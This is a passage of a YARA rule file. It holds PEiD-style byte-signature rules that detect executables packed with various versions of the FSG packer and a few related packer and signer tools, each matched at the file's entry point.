$a = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Microsoft_Visual_Cpp_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v13: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n        $c = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 
47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_3_No_FSG_2_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 
16 00 01 C7 85 F4 FD FF FF 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 
00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cue: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? 
A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_1999: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic_: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n        $b = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_V130Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 
00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 
40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n        $b = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 
00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n        $b = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_40_50: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n        $b = { EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v130_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? 
?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cppx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_3_No_FSG_2_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 
16 00 01 00 74 }\r\n        $b = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 }\r\n        $b = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 